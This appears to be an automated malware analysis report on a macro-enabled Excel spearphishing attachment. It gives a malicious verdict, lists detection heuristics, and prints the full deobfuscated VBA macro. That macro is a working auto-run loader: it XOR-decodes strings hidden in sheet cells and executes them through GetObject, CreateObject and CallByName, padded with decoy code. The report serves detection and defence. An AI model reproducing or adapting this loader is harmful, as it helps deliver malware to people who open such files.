Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file is an Excel spreadsheet containing VBA macros, specifically a Workbook_Open macro. High-severity heuristics indicate the use of CreateObject, GetObject, and CallByName, along with p-code execution, suggesting the macro is designed to run code. The macro's obfuscated nature and the presence of a lure to enable macros point towards a malicious downloader. The script's obfuscation makes it difficult to determine the exact payload or C2, but the overall pattern is consistent with macro-based malware delivery.
Heuristics (8)

- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set Tracked = GetObject(Hosts).CreateObject(SeniorS)`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set Tracked = GetObject(Hosts).CreateObject(SeniorS)`
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: `CallByName Tracked, Dialogue, VbMethod, EngagEmEnt, 0`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `Sub Workbook_Open()`
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs, all found in document text (OLE body):
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/photoshop/1.0/
  - http://purl.org/dc/elements/1.1/
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4826 bytes | 7c486c408742231b1cc860bbac34c2c89d4d5d54163a9235ba1ed9e9be7b21c9 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Hosts As String
Private SeniorS As String
Private Dialogue As String
Private Function IsraelI(ByVal Lookup As String) As Variant
Dim Equation As Long: Equation = 0: Dim Billing() As Byte: Dim Branches() As Byte, Crossing As String, Recall As Integer
Branches = "qf5457bf92"
GoTo Customized
Psychological:
Dim SpecialiStS As String
SpecialiStS = InputBox("temper cool")
Bunch:
If Equation < UBound(Billing) Then
Recall = Equation Mod (10)
GoTo Litigation
InteractIons:
Crossing = Crossing & Chr(Billing(Equation))
Equation = Equation + 1
GoTo Bunch
Else
GoTo Nurses
End If
Charlie:
Dim Bargains As String
Bargains = InputBox("setem ponutn")
Nurses:
IsraelI = Crossing
Exit Function
Customized:
Billing = Destruction(Lookup)
GoTo Bunch
Litigation:
Billing(Equation) = Abs(Billing(Equation) Xor Branches(Recall * 2))
GoTo InteractIons
End Function
Private Sub SymbolS()
Dim Tracked As Object
Dim EngagEmEnt As String
GoTo InteractIons
SubmiSSionS:
Dialogue = IsraelI(Dialogue)
MeMphis Tracked, EngagEmEnt
Exit Sub
Understood:
Hosts = IsraelI(Hosts)
EngagEmEnt = IsraelI(EngagEmEnt)
SeniorS = IsraelI(SeniorS)
Set Tracked = GetObject(Hosts).CreateObject(SeniorS)
GoTo SubmiSSionS
Dim Crossing As String
Crossing = InputBox("pass")
MsgBox Crossing
Hosts = Crossing
InteractIons:
Hosts = Sheets("b73fa").Range("J110").Value: EngagEmEnt = Sheets("b73fa").Range("J189").Value: SeniorS = Sheets("b73fa").Range("G163").Value: Dialogue = Sheets("b73fa").Range("G170").Value
GoTo Understood
End Sub
Sub MeMphis(ByVal Tracked As Object, ByVal EngagEmEnt As String)
CallByName Tracked, Dialogue, VbMethod, EngagEmEnt, 0
End Sub
Sub Workbook_Open()
GoTo Margin
Dim Bargains As String
Bargains = InputBox("Put err code")
Dim SpecialiStS As String
SpecialiStS = InputBox("Optimisrt")
MsgBox SpecialiStS
Margin:
If Bargains = "" Then
SymbolS
End If
End Sub
Private Function Destruction(ByVal Charlie As String) As Variant
Dim Crossing() As Byte, i As Long, Recall As Integer, Margin As Integer
Margin = Len(Charlie) / 2: i = 0: ReDim Crossing(0 To Margin) As Byte
Bargains:
If i < Len(Charlie) Then
Recall = Recall + 1
Crossing(Recall - 1) = Chr(14 + (12 * 2)) & Chr((16 + (4 * 5)) * 2) & Mid(Charlie, i + 1, 2)
i = i + 2
GoTo Bargains
Else
GoTo SpecialiStS
Dim Litigation As String
Litigation = InputBox("Autoscale calculation")
End If
SpecialiStS:
Destruction = Crossing
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```